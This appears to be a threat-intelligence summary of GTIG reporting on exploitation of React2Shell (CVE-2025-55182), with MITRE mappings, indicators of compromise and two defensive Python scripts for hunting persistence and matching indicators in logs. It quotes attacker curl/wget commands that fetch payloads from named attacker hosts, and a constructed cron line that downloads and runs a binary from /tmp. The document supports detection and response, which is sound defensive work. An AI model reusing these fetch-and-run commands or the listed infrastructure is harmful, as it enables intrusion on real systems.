GTIG observed widespread exploitation of CVE-2025-55182 (React2Shell) leading to deployment of MINOCAT, SNOWLIGHT, HISONIC, COMPOOD, ANGRYREBEL.LINUX, and XMRIG across multiple threat clusters including China-nexus espionage and financially motivated actors. Defenders are advised to patch affected React Server Components, deploy WAF rules, audit dependencies, monitor for specific IOCs and hunt for persistence artifacts like hidden directories, cron jobs, systemd services, and modified shell configs. #CVE-2025-55182 #MINOCAT #SNOWLIGHT #HISONIC #COMPOOD #XMRIG #UNC6600
Keypoints
- GTIG confirmed CVE-2025-55182 (React2Shell) is a critical unauthenticated RCE in React Server Components with widespread exploitation after public disclosure.
- Multiple China-nexus clusters (e.g., UNC6600, UNC6586, UNC6588, UNC6603, UNC6595) and financially motivated actors exploited the vulnerability to deploy tunnelers, backdoors, downloaders, and cryptominers.
- Observed malware families and tools include MINOCAT (FRP-based tunneler), SNOWLIGHT (VSHELL downloader), HISONIC (cloud-service-backed backdoor), COMPOOD backdoor, ANGRYREBEL.LINUX, and XMRIG miner.
- Common post-exploitation behaviors: use of wget/curl to fetch payloads, creation of hidden directories ($HOME/.systemd-utils), killing processes (ntpclient), establishing persistence via cron jobs and systemd services, and modifying shell configs.
- GTIG published YARA rules and IOCs (domains, IPs, SHA256 hashes, filenames) and recommends immediate patching to fixed React Server Components versions and deploying Cloud Armor WAF rules as mitigation.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Vulnerability exploited via an unauthenticated HTTP request that executes arbitrary code: ‘The flaw allows unauthenticated attackers to send a single HTTP request that executes arbitrary code with the privileges of the user running the affected web server process.’
- [T1105] Ingress Tool Transfer – Attackers used wget/curl to retrieve and execute payloads: ‘curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/… -o ’ and ‘wget http://45.76.155[.]14/vim -O /tmp/vim’
- [T1053.005] Scheduled Task/Job: Cron – Persistence via creation of cron jobs: ‘establish persistence by creating a new cron job and a systemd service and by inserting malicious commands into the current user’s shell config to execute MINOCAT whenever a new shell is started.’
- [T1543.003] Create or Modify System Process: Systemd Service – Persistence via systemd service creation: ‘establish persistence by creating a new cron job and a systemd service…’
- [T1036] Masquerading – Malware disguised as legitimate binaries (e.g., Vim or sshd) to evade detection: ‘the script then executed the COMPOOD sample, which masqueraded as Vim’ and ‘masquerading the malware as the legitimate OpenSSH daemon (sshd) within the /etc/ directory.’
- [T1070] Indicator Removal on Host – Anti-forensics and timestamp manipulation to hinder detection: ‘the actor also employs timestomping to alter file timestamps and executes anti-forensics commands, such as clearing the shell history (history -c).’
- [T1102] Web Service – Use of legitimate cloud-hosted services for command-and-control and configuration retrieval: ‘HISONIC backdoor that utilizes legitimate cloud services, such as Cloudflare Pages and GitLab, to retrieve its encrypted configuration.’
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communications and staged payload retrieval over HTTP(S): ‘SNOWLIGHT making HTTP GET requests to C2 infrastructure (e.g., reactcdn.windowserrorapis[.]com) to retrieve additional payloads…’
- [T1090] Proxy – Use of tunneling/proxying tools to route traffic and enable remote access: ‘MINOCAT is a 64-bit ELF executable for Linux that includes a custom “NSS” wrapper and an embedded, open-source Fast Reverse Proxy (FRP) client that handles the actual tunneling.’
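The persistence and masquerading behaviors listed above (hidden $HOME/.systemd-utils directory, cron and systemd persistence, shell-config edits, a curl/wget fetch into /tmp, binaries dropped as sshd in /etc or vim in /tmp) translate directly into a host hunt. The script below is an added example, not GTIG's tooling: the directory name, the masquerade paths and the fetch-command shape come from the report, while the list of cron/systemd/shell-config locations, the regexes and the constructed sample tree are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Added example (not GTIG's code): hunt a Linux root for the persistence artifacts
described in the React2Shell reporting. Usage: python3 hunt_persistence.py [ROOT]
(ROOT defaults to /; point it at a mounted image root for offline triage)."""
import os
import re
import stat
import sys
import tempfile
from pathlib import Path

# Values taken from the report text.
HIDDEN_STAGING_DIRS = {".systemd-utils"}
MASQUERADE_PATHS = {"etc/sshd": "binary named sshd dropped in /etc",
                    "tmp/vim": "binary named vim dropped in /tmp"}
# Assumed locations to sweep (not from the report).
SHELL_CONFIGS = (".bashrc", ".bash_profile", ".profile", ".zshrc")
CRON_LOCATIONS = ("etc/crontab", "etc/cron.d", "var/spool/cron/crontabs", "var/spool/cron")
UNIT_LOCATIONS = ("etc/systemd/system", "usr/lib/systemd/system")
# curl/wget piped into a shell or writing an output file, as in the report's fetch commands.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*?(\|\s*(ba)?sh\b|\s-[oO]\s)")
# A command that runs something out of /tmp, /dev/shm or a hidden directory in a home.
SUSPECT_PATH = re.compile(
    r"(?:^|\s|=)(?:/tmp/|/dev/shm/|\$HOME/\.|~/\.|/home/[^/\s]+/\.|/root/\.)")


def scan_lines(path, label):
    """Flag non-comment lines that download-and-execute or run from a suspect path."""
    findings = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if DOWNLOAD_EXEC.search(s):
            findings.append(("download-and-execute", f"{label}:{path}:{n}", s))
        elif SUSPECT_PATH.search(s):
            findings.append(("executes from hidden/temp path", f"{label}:{path}:{n}", s))
    return findings


def hunt(root="/"):
    """Return a list of (category, location, detail) findings for the given root."""
    root = Path(root)
    findings = []
    homes = [root / "root"]
    if (root / "home").is_dir():
        homes += sorted((root / "home").iterdir())
    for home in homes:
        if not home.is_dir() or not os.access(home, os.R_OK):
            continue
        for d in home.iterdir():  # hidden staging directory
            if d.is_dir() and d.name in HIDDEN_STAGING_DIRS:
                findings.append(("known hidden staging directory", str(d), ""))
        for rc in SHELL_CONFIGS:  # shell config modified to launch the implant
            if (home / rc).is_file():
                findings += scan_lines(home / rc, "shell-config")
        user_units = home / ".config/systemd/user"
        if user_units.is_dir():
            for unit in user_units.glob("*.service"):
                findings += scan_lines(unit, "systemd-user-unit")
    for loc in CRON_LOCATIONS:  # cron persistence
        p = root / loc
        files = [p] if p.is_file() else sorted(p.iterdir()) if p.is_dir() else []
        for f in files:
            if f.is_file():
                findings += scan_lines(f, "cron")
    for loc in UNIT_LOCATIONS:  # systemd service persistence
        p = root / loc
        if p.is_dir():
            for unit in sorted(p.glob("*.service")):
                findings += scan_lines(unit, "systemd-unit")
    for rel, why in MASQUERADE_PATHS.items():  # executables under borrowed names
        f = root / rel
        if f.is_file() and f.stat().st_mode & stat.S_IXUSR:
            findings.append(("masquerading binary", str(f), why))
    return findings


def build_sample_tree():
    """Constructed sample filesystem mirroring the report's artifacts (not real data)."""
    root = Path(tempfile.mkdtemp(prefix="hunt-sample-"))
    home = root / "home/alice"
    (home / ".systemd-utils").mkdir(parents=True)
    (home / ".bashrc").write_text("alias ll='ls -l'\n$HOME/.systemd-utils/nssd >/dev/null 2>&1 &\n")
    (root / "etc/cron.d").mkdir(parents=True)
    (root / "etc/crontab").write_text("17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
    (root / "etc/cron.d/sys-update").write_text(
        "*/10 * * * * root curl -fsSL http://staging.invalid/linux_amd64 -o /tmp/.x && /tmp/.x\n")
    (root / "etc/systemd/system").mkdir(parents=True)
    (root / "etc/systemd/system/vim-helper.service").write_text(
        "[Service]\nExecStart=/tmp/vim\n[Install]\nWantedBy=multi-user.target\n")
    (root / "tmp").mkdir()
    (root / "tmp/vim").write_bytes(b"\x7fELF placeholder, not a real binary")
    os.chmod(root / "tmp/vim", 0o755)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/"
    for category, where, detail in hunt(target):
        print(f"[{category}] {where} {detail}")
```

Every finding is a triage lead rather than a verdict: legitimate cron entries and user units that reference dotfiles will surface as "executes from hidden/temp path", so the output is meant to be diffed against a known-good baseline. Because the report notes timestomping, do not rely on file mtimes to age these artifacts; compare against package manager state or a clean image instead.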
Indicators of Compromise
- [Domain] SNOWLIGHT C2 and staging – reactcdn.windowserrorapis[.]com
- [IP Address] SNOWLIGHT and staging servers – 82.163.22[.]139, 216.158.232[.]43 (staging for sex.sh)
- [IP Address] COMPOOD C2 and payload staging – 45.76.155[.]14
- [SHA256] HISONIC samples – df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540, 92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3
- [SHA256] Other observed payloads – 0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 (ANGRYREBEL.LINUX), 13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 (XMRIG downloader, filename: sex.sh)
- [SHA256] SNOWLIGHT and MINOCAT samples – 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a (SNOWLIGHT, filename: linux_amd64), 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 (MINOCAT)
- [Filename] Download scripts and binaries – sex.sh (XMRIG downloader), linux_amd64 (SNOWLIGHT payload)
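The indicators above are published defanged, and a matcher has to refang them to search proxy, DNS or EDR telemetry and then defang them again in its output. The script below is an added example, not GTIG's tooling: the indicator values are the ones listed on this page, while the log format, the sample lines and the word-boundary rules are constructed assumptions.

```python
#!/usr/bin/env python3
"""Added example (not GTIG's code): match this page's indicators against log lines.
Indicators stay defanged in the table, are refanged only to build regexes, and are
reported defanged so hits can be pasted into tickets without creating live links."""
import re

# Indicators as published on the page (defanged).
IOCS = {
    "domain": ["reactcdn.windowserrorapis[.]com"],
    "ip": ["82.163.22[.]139", "216.158.232[.]43", "45.76.155[.]14"],
    "sha256": [
        "df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540",
        "92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3",
        "0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696",
        "13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274",
        "7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a",
        "776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273",
    ],
    "filename": ["sex.sh", "linux_amd64"],
}


def refang(ioc):
    """Turn a published 'a[.]b' indicator back into the literal string found in logs."""
    return ioc.replace("[.]", ".")


def defang(ioc):
    """Neutralise the last dot so a domain or IP in output is not resolvable/clickable."""
    head, sep, tail = ioc.rpartition(".")
    return f"{head}[.]{tail}" if sep else ioc


def _compile(kind, ioc):
    lit = re.escape(refang(ioc))
    if kind == "ip":       # must not be a substring of a longer dotted quad
        return re.compile(rf"(?<![\d.]){lit}(?![\d.])")
    if kind == "sha256":   # exactly 64 hex chars, any case
        return re.compile(rf"(?<![0-9a-fA-F]){lit}(?![0-9a-fA-F])", re.I)
    # domain or filename: not glued to a longer name (blocks "go-linux_amd64" style hits)
    return re.compile(rf"(?<![\w.-]){lit}(?![\w-])", re.I)


# Normalised (defanged) indicator text plus its compiled matcher.
PATTERNS = [
    (kind, defang(refang(ioc)) if kind in ("domain", "ip") else ioc.lower(), _compile(kind, ioc))
    for kind, values in IOCS.items() for ioc in values
]


def match_line(line):
    """Return [(kind, defanged_indicator), ...] for every indicator present in the line."""
    return [(kind, ioc) for kind, ioc, rx in PATTERNS if rx.search(line)]


def scan_logs(text):
    """Return [(line_no, line, hits)] for lines containing at least one indicator."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = match_line(line)
        if hits:
            results.append((n, line, hits))
    return results


# Constructed sample telemetry in an invented "timestamp source client ..." format.
SAMPLE_LOG = """\
2025-12-05T10:14:02Z proxy 10.0.4.17 CONNECT reactcdn.windowserrorapis.com:443 200
2025-12-05T10:14:05Z proxy 10.0.4.17 GET http://45.76.155.14/vim 200 148212
2025-12-05T10:15:11Z proxy 10.0.4.22 GET https://updates.example.org/linux-amd64.tar.gz 200 9812
2025-12-05T10:16:40Z dns 10.0.4.17 A windowserrorapis.com NOERROR
2025-12-05T10:17:03Z proxy 10.0.4.31 GET http://216.158.232.43/sex.sh 200 3021
2025-12-05T10:17:09Z edr host-31 file_write /tmp/linux_amd64 sha256=7F05BAD031D22C2BB4352BF0B6B9EE2CA064A4C0E11A317E6FEDC694DE37737A
"""

if __name__ == "__main__":
    for n, line, hits in scan_logs(SAMPLE_LOG):
        print(f"line {n}: " + ", ".join(f"{k}={v}" for k, v in hits))
```

The matcher is deliberately exact: the DNS line for the parent domain windowserrorapis.com does not fire because only the reactcdn subdomain is published as an indicator, and the lookbehinds stop 45.76.155.14 from matching inside 145.76.155.14. Widening to apex domains or CIDR ranges is a local decision to make with the false-positive rate of each log source in mind.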